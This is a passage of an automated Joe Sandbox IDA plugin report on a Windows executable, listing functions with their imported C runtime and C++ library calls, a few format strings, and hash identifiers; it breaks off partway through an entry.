_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF674172C77
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF674172CC3

Memory Dump Source

Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true

Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$ControlDevicememcpy
String ID:
API String ID: 2471032920-0
Opcode ID: cbfd7e03b946ee20cd95debc597430403996987513b6cce6d13e935f369098e1
Instruction ID: 2529e725b6a054c0001d67cb197d01d984bd2867e7c521eb52fe61e9c0da7e2f
Opcode Fuzzy Hash: cbfd7e03b946ee20cd95debc597430403996987513b6cce6d13e935f369098e1
Instruction Fuzzy Hash: 60E1AF63F28B86C5FB10EB64D4883BD2761EB557A4F505232EA6D57AD9EF38E081C340

Function 00007FF67415EC70 Relevance: 13.7, APIs: 8, Strings: 1, Instructions: 161COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF67415ECA8
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF67415ED5C
memcpy.VCRUNTIME140 ref: 00007FF67415ED7C
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF67415ED9C
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF67415EE6A
memcpy.VCRUNTIME140 ref: 00007FF67415EE81
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF67415EEA8
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF67415EEC9

Strings

?, xrefs: 00007FF67415ECEA

Memory Dump Source

Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true

Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd

Similarity

API ID: freemalloc$memcpy
String ID: ?
API String ID: 3519880569-1684325040
Opcode ID: 3aec656839632b3a9f7a1788794446eb268fc2257a53afcec555d603ff44c36d
Instruction ID: 3f1978ff264d7205149407b0bc104b625edbdb40ca8ab5a19397fc2dd2a67630
Opcode Fuzzy Hash: 3aec656839632b3a9f7a1788794446eb268fc2257a53afcec555d603ff44c36d
Instruction Fuzzy Hash: 3E714733A19B81C6EB55DF25D4882B8B7A4FB48B44F089239CE8D87351EF38E4A5C700

Function 00007FF674142840 Relevance: 13.6, APIs: 9, Instructions: 76COMMON

Download Yara Rule

APIs

fseek.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF67414288D
ftell.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF67414289E
fseek.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF6741428B8
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF6741428DA
fread.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF6741428F6
fclose.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF674142904
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF67414291F
fclose.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF674142927
fclose.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF67414293D

Memory Dump Source

Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true

Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd

Similarity

API ID: fclose$fseek$freadfreeftellmalloc
String ID:
API String ID: 3246642831-0
Opcode ID: 33f0608f3dd53fe92e6a27d8e228b8171e8e6b079c646f90b21fb53d5b308df6
Instruction ID: 416b80cbf64b420f1919e22f4eef723abe22cc306766f85ccbba00509272b07d
Opcode Fuzzy Hash: 33f0608f3dd53fe92e6a27d8e228b8171e8e6b079c646f90b21fb53d5b308df6
Instruction Fuzzy Hash: E2315223B29792C1FA95AB5AB48833827A0EF49FD4F586070DD4E83795DE3DE4814700

Function 00007FF67415BA00 Relevance: 11.4, APIs: 9, Instructions: 130COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00007FF6741412AE), ref: 00007FF67415BA31
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00007FF6741412AE), ref: 00007FF67415BA5A
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00007FF6741412AE), ref: 00007FF67415BA83
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00007FF6741412AE), ref: 00007FF67415BAB8
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00007FF6741412AE), ref: 00007FF67415BAE1
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00007FF6741412AE), ref: 00007FF67415BB10
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF67415BB94
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF67415BBC7
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF67415BC1C

Memory Dump Source

Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true

Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 44b497ab1427ec3993459d5f7e8633dfd8148f3b61f90d66b93ff010372033f1
Instruction ID: 20670ed91315f064d9bb1100e1b20ddfae791660d9e8eaa5d0799896b72bea3b
Opcode Fuzzy Hash: 44b497ab1427ec3993459d5f7e8633dfd8148f3b61f90d66b93ff010372033f1
Instruction Fuzzy Hash: 0151E132626B81C6EB55EF21E48427873A4FB44F84F185A35CE4D87754DF38E590CB50

Function 00007FF6741523A0 Relevance: 10.7, APIs: 5, Strings: 2, Instructions: 155COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF6741523EE
memcpy.VCRUNTIME140 ref: 00007FF674152404
memchr.VCRUNTIME140 ref: 00007FF6741524A5
memchr.VCRUNTIME140 ref: 00007FF6741524C1
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF6741525AE

Strings

], xrefs: 00007FF674152482
Window, xrefs: 00007FF6741524DA

Memory Dump Source

Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true

Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd

Similarity

API ID: memchr$freemallocmemcpy
String ID: Window$]
API String ID: 96147131-2892678728
Opcode ID: ed5b8489ed22b8da763a8917eea3fd69fa1d5401eec8b2c99788c0df10efc556
Instruction ID: 59d5b494c4193041e36c946bced6c8f2eba7d074cf24878fdebd83ee591a69d5
Opcode Fuzzy Hash: ed5b8489ed22b8da763a8917eea3fd69fa1d5401eec8b2c99788c0df10efc556
Instruction Fuzzy Hash: E351E323B38785C1EB61AB1695983F9A791AB49FD4F484171DE4DC7B88DE7CE482CB00

Function 00007FF67418BA20 Relevance: 10.6, APIs: 7, Instructions: 147COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(00000000,?,?,00007FF674172A37), ref: 00007FF67418BAB4
memcpy.VCRUNTIME140(00000000,?,?,00007FF674172A37), ref: 00007FF67418BAF8
memcpy.VCRUNTIME140(00000000,?,?,00007FF674172A37), ref: 00007FF67418BB10
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,?,?,00007FF674172A37), ref: 00007FF67418BB98
memcpy.VCRUNTIME140(00000000,?,?,00007FF674172A37), ref: 00007FF67418BBC5
memcpy.VCRUNTIME140(00000000,?,?,00007FF674172A37), ref: 00007FF67418BBE0
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF67418BC03

Memory Dump Source

Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true

Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd

Similarity

API ID: memcpy$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 1775671525-0
Opcode ID: 49f85d3e600eb9579d3aad7794df8eb1d36ad54acc32a5e73e93981ec5823baf
Instruction ID: 0fb09043021a34bcebe18a2b230c2d06d064da6d5c56a3b225f5ac2b0e178fd1
Opcode Fuzzy Hash: 49f85d3e600eb9579d3aad7794df8eb1d36ad54acc32a5e73e93981ec5823baf
Instruction Fuzzy Hash: B851BF23B18B82D2EA10EF21D5882782364FB55BA4F144632EF6C87796DF38E695D340

Function 00007FF67418A980 Relevance: 10.6, APIs: 7, Instructions: 133COMMON

Download Yara Rule

APIs

?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@XZ.MSVCP140(?,?,?,?,?,00007FF674174B65), ref: 00007FF67418AA13
?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140(?,?,?,?,?,00007FF674174B65), ref: 00007FF67418AA66
?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J@Z.MSVCP140(?,?,?,?,?,00007FF674174B65), ref: 00007FF67418AA8F
?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140(?,?,?,?,?,00007FF674174B65), ref: 00007FF67418AAB6
?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140(?,?,?,?,?,00007FF674174B65), ref: 00007FF67418AAFC
?uncaught_exceptions@std@@YAHXZ.MSVCP140(?,?,?,?,?,00007FF674174B65), ref: 00007FF67418AB03
?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAXXZ.MSVCP140(?,?,?,?,?,00007FF674174B65), ref: 00007FF67418AB10

Memory Dump Source

Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true

Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd

Similarity

API ID: D@std@@@std@@U?$char_traits@$?sputc@?$basic_streambuf@$?flush@?$basic_ostream@?setstate@?$basic_ios@?sputn@?$basic_streambuf@?uncaught_exceptions@std@@Osfx@?$basic_ostream@V12@
String ID:
API String ID: 729925803-0
Opcode ID: 100e41691c466b7234c52d2e698195f0e24465792a43b1836ef0097fc69b14f2
Instruction ID: 76d938c93de5530701014f2f77b93d46212c6cbe8942d030d3376f549d5fd4ae
Opcode Fuzzy Hash: 100e41691c466b7234c52d2e698195f0e24465792a43b1836ef0097fc69b14f2
Instruction Fuzzy Hash: B5512033619A41C2EB609B19E5D8239ABA4EB85FE5F15C631CE5E87BA0CF3DD4428300

Function 00007FF67418B090 Relevance: 10.6, APIs: 7, Instructions: 71COMMON

Download Yara Rule

APIs

??0_Lockit@std@@QEAA@H@Z.MSVCP140(?,?,?,?,?,?,00000000,00007FF674189DBA), ref: 00007FF67418B0BD
??Bid@locale@std@@QEAA_KXZ.MSVCP140(?,?,?,?,?,?,00000000,00007FF674189DBA), ref: 00007FF67418B0D7
?_Getgloballocale@locale@std@@CAPEAV_Locimp@12@XZ.MSVCP140(?,?,?,?,?,?,00000000,00007FF674189DBA), ref: 00007FF67418B109
?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SA_KPEAPEBVfacet@locale@2@PEBV42@@Z.MSVCP140(?,?,?,?,?,?,00000000,00007FF674189DBA), ref: 00007FF67418B134
std::_Facet_Register.LIBCPMT ref: 00007FF67418B14D
??1_Lockit@std@@QEAA@XZ.MSVCP140(?,?,?,?,?,?,00000000,00007FF674189DBA), ref: 00007FF67418B16C
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF67418B197

Memory Dump Source

Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true

Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd

Similarity

API ID: Lockit@std@@$??0_??1_Bid@locale@std@@Concurrency::cancel_current_taskFacet_Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterV42@@Vfacet@locale@2@std::_
String ID:
API String ID: 762505753-0
Opcode ID: 701487d62185e58df9b369bbef70d97be78819edea6edb368ed29a79d28ac0e2
Instruction ID: 6062b845e0b97149a15c6ac8e927197e9115a3a91f422e0722128c998b5cb93b
Opcode Fuzzy Hash: 701487d62185e58df9b369bbef70d97be78819edea6edb368ed29a79d28ac0e2
Instruction Fuzzy Hash: BF314167A18B81C5EA14EF11F8881797764FB88BA4F484631EA9E877A8DF3CE551C700

Function 00007FF674152860 Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 131stringCOMMON

Download Yara Rule

APIs

strstr.VCRUNTIME140 ref: 00007FF6741529D7

Strings

Collapsed=%d, xrefs: 00007FF674152A3A
Size=%d,%d, xrefs: 00007FF674152A1E
Pos=%d,%d, xrefs: 00007FF674152A01
[%s][%s], xrefs: 00007FF6741529E1
###, xrefs: 00007FF6741529CD

Memory Dump Source

Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true

Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd

Similarity

API ID: strstr
String ID: ###$Collapsed=%d$Pos=%d,%d$Size=%d,%d$[%s][%s]
API String ID: 1392478783-2972057365
Opcode ID: 95cbcc0c1e863908b271582b13f5326ad6ae6e9295d7071c4932028e7d2c7719
Instruction ID: 71307d8adb8c68fa8441a1db60be89e5d3f26a4f25bfc1a1ec5361805f6de02c
Opcode Fuzzy Hash: 95cbcc0c1e863908b271582b13f5326ad6ae6e9295d7071c4932028e7d2c7719
Instruction Fuzzy Hash: EE51DE33A28686C6DB21EF16E4885B8B7A1FB85B84F558175DE9D87354CF3CE581CB00

Function 00007FF67418B870 Relevance: 9.1, APIs: 6, Instructions: 128COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,?,?,?,00007FF674189E95), ref: 00007FF67418B95E
memcpy.VCRUNTIME140(?,?,?,?,?,00007FF674189E95), ref: 00007FF67418B96C
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,00007FF674189E95), ref: 00007FF67418B9A5
memcpy.VCRUNTIME140(?,?,?,?,?,00007FF674189E95), ref: 00007FF67418B9AF
memcpy.VCRUNTIME140(?,?,?,?,?,00007FF674189E95), ref: 00007FF67418B9BD
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF67418B9EF

Memory Dump Source

Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true

Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd

Similarity

API ID: memcpy$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 1775671525-0
Opcode ID: 822a3280da562e4dce536d06efb3c8ccdb25b83d94d67819801b7ef5d77266b5
Instruction ID: 46c87718747d20e61b90d828156be32fd1d84017cc535ebab9e1d9620a3e42f3
Opcode Fuzzy Hash: 822a3280da562e4dce536d06efb3c8ccdb25b83d94d67819801b7ef5d77266b5
Instruction Fuzzy Hash: 0641D3A3B29B45C4EE10EB16A4883B96355BB44FE4F144631EE6D8B786DE3CE141C300

Function 00007FF67418BEE0 Relevance: 9.1, APIs: 6, Instructions: 122COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6741729C8), ref: 00007FF67418BFCA
memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6741729C8), ref: 00007FF67418BFD9
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6741729C8), ref: 00007FF67418C00D
memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6741729C8), ref: 00007FF67418C014
memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6741729C8), ref: 00007FF67418C023
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF67418C04E

Memory Dump Source

Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true

Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd

Similarity

API ID: memcpy$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 1775671525-0
Opcode ID: bbed56a126e6f83f3b6848fe60efaaae478843fa5b6ea2493812493f378ec645
Instruction ID: f0c5ed1ad0aa8d95792c10fa6124de5030bb71b94c37f2d3535b69aafdcc2c9c
Opcode Fuzzy Hash: bbed56a126e6f83f3b6848fe60efaaae478843fa5b6ea2493812493f378ec645
Instruction Fuzzy Hash: E041D163B29745C5EE14FB12A4882B8A359AB44BE0F544632EE5D87BD6DF7CE081C300

Function 00007FF67418B6E0 Relevance: 9.1, APIs: 6, Instructions: 121COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140 ref: 00007FF67418B7CD
memset.VCRUNTIME140 ref: 00007FF67418B7DA
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF67418B813
memcpy.VCRUNTIME140 ref: 00007FF67418B81D
memset.VCRUNTIME140 ref: 00007FF67418B82A
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF67418B85F

Memory Dump Source

Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true

Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd

Similarity

API ID: memcpymemset$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3189120677-0
Opcode ID: 417a59feedb8a99d28d0fbe5bdc5c86aeeb4b936b7126d3430bdbc5151953410
Instruction ID: d87c252d2b09f133f411159ca479f9cc363d8b02e1ce4d780b4c11febf5cd7fc
Opcode Fuzzy Hash: 417a59feedb8a99d28d0fbe5bdc5c86aeeb4b936b7126d3430bdbc5151953410
Instruction Fuzzy Hash: 5841D363B29B45C5EA10FB12A58837D6359AB45BE4F144631EE6D877D6DE3CD041C300

Function 00007FF674189810 Relevance: 9.1, APIs: 6, Instructions: 114COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,00007FF674172701), ref: 00007FF67418985C
memset.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,00007FF674172701), ref: 00007FF6741898F8
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF674189917
??1?$basic_istream@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF674172701), ref: 00007FF67418997B
??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF674172701), ref: 00007FF674189984

Memory Dump Source

Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true

Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd

Similarity

API ID: D@std@@@std@@U?$char_traits@memset$??1?$basic_ios@??1?$basic_istream@Concurrency::cancel_current_task
String ID:
API String ID: 915423947-0
Opcode ID: b1e84b6d6140a77035b949f7408225f05d33f3f205e7cc5b0ab3eaf0dc2f1b35
Instruction ID: aa1803dc0a715a9343a3c77ee62e7252f7acee776e87f7db6b27337bacc64f43
Opcode Fuzzy Hash: b1e84b6d6140a77035b949f7408225f05d33f3f205e7cc5b0ab3eaf0dc2f1b35
Instruction Fuzzy Hash: 6F41D023B28B8AC5EB14AB65E4883B92354EB45BA4F144231EB2D47BD6DF3CE481C740

Function 00007FF674189CE0 Relevance: 9.1, APIs: 6, Instructions: 84COMMON

Download Yara Rule

APIs

?_Fiopen@std@@YAPEAU_iobuf@@PEBDHH@Z.MSVCP140 ref: 00007FF674189D1A
?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ.MSVCP140 ref: 00007FF674189D37
_get_stream_buffer_pointers.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF674189D60
?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEBA?AVlocale@2@XZ.MSVCP140 ref: 00007FF674189DAB

Part of subcall function 00007FF67418B090: ??0_Lockit@std@@QEAA@H@Z.MSVCP140(?,?,?,?,?,?,00000000,00007FF674189DBA), ref: 00007FF67418B0BD
